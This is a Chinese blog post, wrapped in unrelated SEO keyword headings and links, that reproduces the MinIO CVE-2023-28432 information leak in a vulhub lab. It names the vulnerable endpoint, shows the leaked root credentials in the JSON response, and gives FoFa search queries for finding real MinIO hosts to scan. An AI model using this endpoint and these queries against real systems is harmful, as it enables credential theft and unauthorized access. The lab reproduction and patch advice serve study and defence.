当前位置: 首页 > news >正文

门户网站建设基础术语怎么做自助购物网站

门户网站建设基础术语,怎么做自助购物网站,建设网站怎么判断是电脑还是手机,手机网站开发需要哪些人前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。 0x00 环境配置 …

前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

0x00 环境配置

此次实验,我们继续使用P神的Minio的docker环境。启动环境:

cd /vulhub-master/minio/CVE-2023-28432/
docker-compose up -d

启动完成后访问http://your-ip:9001为集群的web管理页面,另外http://your-ip:9000为集群的API接口。

0x01 触发漏洞

这个漏洞的节点存在于这个路径:http://your-ip:9000/minio/bootstrap/v1/verify
对该路径发送POST请求会返回一段JSON数据:

{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}

在该json字段中,我们可以看到MINIO_ROOT_USER字段包含账户名,MINIO_ROOT_PASSWORD字段包含账户的密码。所以该信息泄露其实就是API接口的信息泄露。我们可以根据这个特性,写一个批量的脚本文件来检测,并将其中的关键信息返回。

0x02 POC利用

先在FoFa或者鹰图上面收集跟MinIO集群相关的资产。
banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
脚本相关较为敏感,若有需要可以加群下载。
其实脚本比较简单,就是向这个漏洞URL发送请求,判断返回包是否包含敏感字段。
如果包含就说明有敏感JSON字段,最后对这个JSON数据进行解析,拿出其中我们需要的两个字段即可。下图为利用效果。

0x03 加固建议

升级官方最新补丁可以修复该漏洞。

http://www.yayakq.cn/news/697685/

相关文章:

  • 商务网站建设中的必备功能公司网站建设后期维护
  • 陕西有色建设有限公司网站个人soho要怎么做企业网站
  • 做阿里巴巴网站百度为什么不收录我的网站
  • 如何在网上做网站推广杭州网站seo优化
  • 网站排名优化机构网页制作站点
  • 购物网站开发教程门户类网站建设
  • 网站建设文字教程html5网站制作培训
  • 网站公司郑州腾宁科技做网站399元全包
  • html素材免费下载包头整站优化
  • 兴平市住房和城乡建设局门户网站网站建设的主要步骤
  • 游戏网站上做银商为网站人员化工厂建设网站
  • wordpress图片站主题基层建设被哪些网站全文收录
  • 网站建设方案汇报阿里云使用wordpress-move
  • 兴隆大院网站哪个公司做的天元建设集团有限公司新中大i8
  • 阿里云 万网 网站建站软件免费版下载
  • 实现微信绑定登录网站郑州机械网站制作
  • 科技平台网站建设wordpress插件中文版下载
  • 克隆网站带后台制作网页的思路
  • 信阳网站开发公司泉州一个网站多少钱
  • 建设银行网站 购买外汇广东建设信息网站
  • 企业门户网站管理办法温州网站建设服务中心
  • 物流网站素材wordpress 无图插件下载
  • 做视频官方网站凡客现在还能买吗
  • 潍坊市公共法律知识培训网站中国美食网页设计
  • 做书评的网站中国教师教育培训网
  • 自己做网站切入地图济南建设网站制作
  • 怎么样百度搜到自己的网站网站二级页面设计要求
  • 在linux系统上用什么做网站网络营销的目的和意义
  • 广西省住房和城乡建设厅官方网站产品网站免费模板下载
  • 推广网站推广高端网站设计开发